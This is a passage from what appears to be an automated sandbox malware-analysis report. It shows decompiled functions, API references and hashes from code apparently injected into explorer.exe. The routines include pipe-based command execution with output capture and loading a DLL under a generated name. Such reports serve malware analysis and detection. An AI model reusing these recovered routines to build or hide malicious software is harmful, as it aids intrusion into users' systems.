						_t6 = _t40 + 3; // 0xd09b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x000d2125
0x000d212a
0x000d212e
0x000d212e
0x000d2133
0x000d2138
0x000d2139
0x000d213c
0x000d213d
0x000d2142
0x000d2145
0x000d2146
0x000d214b
0x000d2152
0x000d21f8
0x000d21f8
0x00000000
0x000d2161
0x000d2161
0x000d2168
0x000d216c
0x000d2173
0x000d217c
0x000d217e
0x000d217e
0x000d217c
0x000d218d
0x000d21b3
0x000d21bc
0x000d21be
0x000d21c4
0x000d21f3
0x000d21f3
0x000d21fb
0x000d21fe
0x000d21fe
0x000d21c6
0x000d21c7
0x000d21cd
0x000d21cf
0x000d21cf
0x000d21d4
0x000d21d3
0x000d21d3
0x000d21db
0x000d21e7
0x000d21f1
0x000d21f1
0x00000000
0x000d219d
0x000d219d
0x000d219d
0x000d21a3
0x00000000
0x00000000
0x000d21a5
0x000d21ab
0x000d21b0
0x00000000
0x000d21b0
0x000d218d

APIs

_snprintf.MSVCRT ref: 000D2146
localeconv.MSVCRT ref: 000D2161
strchr.MSVCRT ref: 000D2173
strchr.MSVCRT ref: 000D2184
strchr.MSVCRT ref: 000D2192
strchr.MSVCRT ref: 000D21B7

Strings

%.*g, xrefs: 000D213D

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
Instruction ID: f6153b53931c816f5cf90fdbc4519a87119c60c3e64c05486d80ffcae23a6d65
Opcode Fuzzy Hash: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
Instruction Fuzzy Hash: B721337B6447427AD7254A289CC6BBA7BCCDF75320F158117FE109A382EA74EC4093B0

Uniqueness

Uniqueness Score: -1.00%

Function 000D02B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 000D0332
qsort.MSVCRT ref: 000D05B0

Strings

false, xrefs: 000D0315
%I64d, xrefs: 000D0324
null, xrefs: 000D02F7
true, xrefs: 000D0309

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
Instruction ID: 684f5bda4ccecb9397834d04cf382ea593694727c20340f8e6e8807afc758164
Opcode Fuzzy Hash: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
Instruction Fuzzy Hash: 9EE16DB190030ABBDF119F64DC46FEF3BA9EF55344F10801AFD1996242EA31DA619BB0

Uniqueness

Uniqueness Score: -1.00%

Function 000CD748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 000CD75C
SysAllocString.OLEAUT32(?), ref: 000CD764
SysAllocString.OLEAUT32(00000000), ref: 000CD778
SysFreeString.OLEAUT32(?), ref: 000CD7F3
SysFreeString.OLEAUT32(?), ref: 000CD7F6
SysFreeString.OLEAUT32(?), ref: 000CD7FB

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
Instruction ID: 3d9f34c9eecb127b5d7570106aa8ec4b723249f91a2853b660b7b91b34ec35e3
Opcode Fuzzy Hash: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
Instruction Fuzzy Hash: 5A21F875900218BFDB10DFA5CC88DAFBBBDEF48354B1044AAF505A7250EA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000D07F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 000D0865
\u%04X, xrefs: 000D0911
\u%04X\u%04X, xrefs: 000D0950

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
Instruction ID: 3547e2d1494ab77912d377d0d288dcf2f58bd85626a5821c1112c12d5c5f1659
Opcode Fuzzy Hash: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
Instruction Fuzzy Hash: C5412C31600305A7EF785A68CC69BFEAA98DF84350F240027F98DD6356D661CD9197F1

Uniqueness

Uniqueness Score: -1.00%

Function 000CD523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E000CD523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0xdb848, 0, 1, 0xdb858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E000C8604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x000cd530
0x000cd533
0x000cd536
0x000cd547
0x000cd54d
0x000cd55e
0x000cd566
0x000cd5b7
0x000cd5b7
0x000cd5bc
0x000cd5c1
0x000cd5c1
0x000cd5c4
0x000cd5c9
0x000cd5ce
0x000cd5ce
0x000cd5d1
0x000cd568
0x000cd569
0x000cd56f
0x000cd580
0x000cd585
0x00000000
0x000cd587
0x000cd594
0x000cd59c
0x00000000
0x000cd59e
0x000cd5a0
0x000cd5a8
0x00000000
0x000cd5aa
0x000cd5ad
0x000cd5b3
0x000cd5b3
0x000cd5a8
0x000cd59c
0x000cd585
0x000cd5d6

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
SysAllocString.OLEAUT32(00000000), ref: 000CD569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 9262fb1cee6356bb2d2bedcff923adbaefdfcc94595994d41f249e05877c609d
Instruction ID: b52495c3964bc2eee305646e62cfc807d5bb65c34ee2dbb5966ceb0035954956
Opcode Fuzzy Hash: 9262fb1cee6356bb2d2bedcff923adbaefdfcc94595994d41f249e05877c609d
Instruction Fuzzy Hash: 3821EA74601245BFEB249B66DC4DE6FBFBCEFC6B15F10416EB901A6290DA709A01CB30

Uniqueness

Uniqueness Score: -1.00%

Function 000D21FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000D21FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000D22CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L000D2291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0xd8250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L000D2291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0xd8258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x000d21ff
0x000d2207
0x000d220c
0x000d220f
0x000d2214
0x000d221a
0x000d2223
0x000d2227
0x000d2227
0x000d2223
0x000d2229
0x000d222e
0x000d2237
0x000d223c
0x000d223f
0x000d2248
0x000d224a
0x000d2251
0x000d2262
0x000d2262
0x000d2264
0x000d226c
0x000d2273
0x00000000
0x000d226e
0x000d2272
0x000d2272
0x000d2253
0x000d2253
0x000d2259
0x000d225b
0x000d2260
0x000d2276
0x000d2279
0x000d227e
0x00000000
0x00000000
0x00000000
0x000d2260

APIs

localeconv.MSVCRT ref: 000D2207
strchr.MSVCRT ref: 000D221A
_errno.MSVCRT ref: 000D2229
strtod.MSVCRT ref: 000D2237
_errno.MSVCRT ref: 000D2264

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
Instruction ID: 02ad6d30cf94f535e5970a8dc70227cda6efb6bc9110fd6e31c748a412764503
Opcode Fuzzy Hash: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
Instruction Fuzzy Hash: A7012435804305FADB122F25E9026FD3BA4AFAA360F2041C2F980672A2CB358854DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 000CA9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E000CA9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E000C861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0xde684; // 0x14cf8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0xde684; // 0x14cf8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E000C8604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0xde684; // 0x14cf8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0xde684; // 0x14cf8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0xde684; // 0x14cf8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0xde684; // 0x14cf8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000C91A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E000C9292(_t127);
						E000C861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E000CC379(_t127));
				_t98 =  *0xde68c; // 0x14cfab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0xde684; // 0x14cf8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0xde684; // 0x14cf8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E000C9256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E000C861A( &_v32, 0);
				return _t128;
			}

0x000ca9c2
0x000ca9c4
0x000ca9d0
0x000ca9d5
0x000ca9d8
0x000ca9da
0x000ca9dd
0x000ca9e0
0x000ca9e7
0x000ca9ea
0x000ca9f1
0x000ca9f4
0x000ca9fe
0x000ca9ff
0x000caa02
0x000caa04
0x000caa05
0x000caa1c
0x000cab9c
0x00000000
0x000cab9c
0x000caa33
0x000cab68
0x000cab6e
0x000cab79
0x000cab7b
0x000cab83
0x000cab83
0x000cab8a
0x000cab8c
0x000cab95
0x000cab95
0x00000000
0x000cab98
0x000caa39
0x000caa3c
0x000caa3f
0x000caa45
0x000caa4f
0x000caa59
0x000caa60
0x000caa69
0x000caa6b
0x000caa71
0x00000000
0x00000000
0x000caa7c
0x000caa83
0x000caa84
0x000caa89
0x000caa8a
0x000caa8b
0x000caa90
0x000caa92
0x000caa93
0x000caa94
0x000caa97
0x000caa9d
0x00000000
0x00000000
0x000caaa3
0x000caaab
0x000caaae
0x000caab6
0x000caab9
0x000caabc
0x000caac2
0x000caad6
0x000caadc
0x000caae2
0x000cab0b
0x000caae4
0x000caae4
0x000caae6
0x000caae8
0x000caaf0
0x000caaf8
0x000caafd
0x000caafd
0x000cab11
0x000cab13
0x000cab13
0x000cab1b
0x000cab23
0x000cab24
0x000cab29
0x000cab32
0x000cab52
0x000cab52
0x000cab5a
0x000cab5d
0x000cab65
0x00000000
0x000cab65
0x000cab3b
0x000cab3f
0x00000000
0x00000000
0x000cab47
0x00000000

APIs

memset.MSVCRT ref: 000CA9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 000CAA18
CreatePipe.KERNEL32(000C65A9,?,0000000C,00000000), ref: 000CAA2F

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660

Strings

D, xrefs: 000CAA4F

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: 65f06a4a2bef680f92b27d2d990ddab298a87e6d022ce6ef6432917450b0d7e6
Instruction ID: ee5a40d96a8d170e39ef4db7aa177635ee1e57970e24f23723ed2304e9932c98
Opcode Fuzzy Hash: 65f06a4a2bef680f92b27d2d990ddab298a87e6d022ce6ef6432917450b0d7e6
Instruction Fuzzy Hash: 69512972E00209AFEB51DFA4CC85FEEB7B9EB08304F10416AF504E7292DB749E048B65

Uniqueness

Uniqueness Score: -1.00%

Function 000CC4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E000CC4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0xde688; // 0xf0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000C95E1(_t50, 0xb62);
					_t66 =  *0xde688; // 0xf0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E000C9640( &_v140, 0x40, L"%08x", E000CD400(_t66 + 0xb0, E000CC379(_t66 + 0xb0), 0));
					_t20 =  *0xde688; // 0xf0000
					asm("sbb eax, eax");
					_t25 = E000C95E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0xde688; // 0xf0000
					_t68 = E000C92E5(_t26 + 0x1020);
					_v12 = _t68;
					E000C85D5( &_v8);
					_t32 =  *0xde688; // 0xf0000
					_t34 = E000C92E5(_t32 + 0x122a);
					 *0xde784 = _t34;
					_t35 =  *0xde684; // 0x14cf8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0xde784);
					 *0xde77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E000CE171(0xdbb48, _t60);
					}
					 *0xde780 = _t38;
					E000C861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0xde780 != 0) {
						goto L10;
					} else {
						E000C861A(0xde784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0xde780 == 0) {
						_t46 =  *0xde6bc; // 0x14cfa18
						 *0xde780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x000cc4ce
0x000cc4ce
0x000cc4ce
0x000cc4d1
0x000cc4dd
0x000cc4e8
0x000cc504
0x000cc509
0x000cc512
0x000cc514
0x000cc51c
0x000cc53d
0x000cc542
0x000cc54f
0x000cc55a
0x000cc561
0x000cc568
0x000cc579
0x000cc57f
0x000cc582
0x000cc599
0x000cc5a5
0x000cc5ad
0x000cc5b4
0x000cc5ba
0x000cc5c6
0x000cc5cc
0x000cc5d3
0x000cc5e6
0x000cc5d5
0x000cc5d5
0x000cc5d8
0x000cc5de
0x000cc5e3
0x000cc5e8
0x000cc5f3
0x000cc605
0x000cc617
0x00000000
0x000cc619
0x000cc620
0x00000000
0x000cc626
0x000cc627
0x000cc627
0x000cc62e
0x000cc630
0x000cc635
0x000cc635
0x000cc63a
0x000cc63e
0x000cc63e

APIs

LoadLibraryW.KERNEL32 ref: 000CC5C6
memset.MSVCRT ref: 000CC605

Strings

%08x, xrefs: 000CC52F
dll, xrefs: 000CC588

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 11a4996b2332424ec37d0d3581d2029684f0cd19d397c3050441eee7ff692f5f
Instruction ID: 7bb140d26ea90620d688a4d55edfb562bb055213326fc88d9619b145c98fbc54
Opcode Fuzzy Hash: 11a4996b2332424ec37d0d3581d2029684f0cd19d397c3050441eee7ff692f5f
Instruction Fuzzy Hash: A7319572A01244ABFB50AB64DC89F9E33ACEB54354F14402FF909DB292DB78D9458734

Uniqueness

Uniqueness Score: -1.00%

Function 000D2D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E000D2D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E000D5D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E000D4AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E000D4C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
